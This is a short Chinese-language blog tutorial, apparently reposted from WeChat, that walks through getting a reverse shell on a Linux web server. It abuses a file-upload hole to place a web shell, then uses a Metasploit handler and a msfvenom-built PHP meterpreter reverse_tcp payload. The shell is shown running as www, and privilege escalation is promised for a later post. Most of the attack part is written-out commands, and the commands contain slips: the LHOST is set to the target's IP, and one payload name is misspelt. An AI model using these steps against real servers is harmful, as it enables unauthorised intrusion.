msf实现linux shell反弹
2019-08-16 10:55:35 Author: mp.weixin.qq.com(查看原文) 阅读量:128 收藏


运行环境:

kali       ip:192.168.123.90
Linux    ip:192.168.123.5

Linux服务器上开有80端口,并且有上传漏洞,具体如何绕过就不多讲,主要讲的是msf生成木马反弹linux shell。


话不多说,上传一句话,菜刀连接。

然后打开kali 并启动msf


进入 >   use exploit/multi/handler
设置 payload>   set payload php/metrpreter/reverse_tcp

设置IP  > set lhost 192.168.123.90

查看一下参数>show options

没啥问题开始监听>run

再在终端上生产msf木马

msfvenom -p php/meterpreter_reverse_tcp LHOST=192.168.123.5 LPORT=4444  -f raw > msf.php

然后将产生的木马用小马上传上去,并且在浏览器上访问

我们再看msf发现已经有会话反弹过来了,我们接下来看一下


然后我们查看并进入会话查看信息

进入shell


上面已经进入shell 并且执行的ls命令,下面让我们看下权限

是www权限,然后接下来开始提权,皮一下,提权手法见下一期分享。


本人也是小菜,望大佬勿喷。

有错的地方及时联系本人,本人会及时修改,谢谢大家关看,及时交流。

你可能喜欢

看我如何利用微信反弹shell

不知道密码的情况下hacking mysql并反弹shell

zabbix反弹shell并拿下系统root权限


文章来源: http://mp.weixin.qq.com/s?__biz=MzAxMjE3ODU3MQ==&mid=2650456660&idx=3&sn=68d111989ed83d7385fe7fcb63203717&chksm=83bba7b0b4cc2ea6bd7c68fdd51ef5ebfc9b8295b6011276eacb53da1b6a6749c70f18678840#rd
如有侵权请联系:admin#unsafe.sh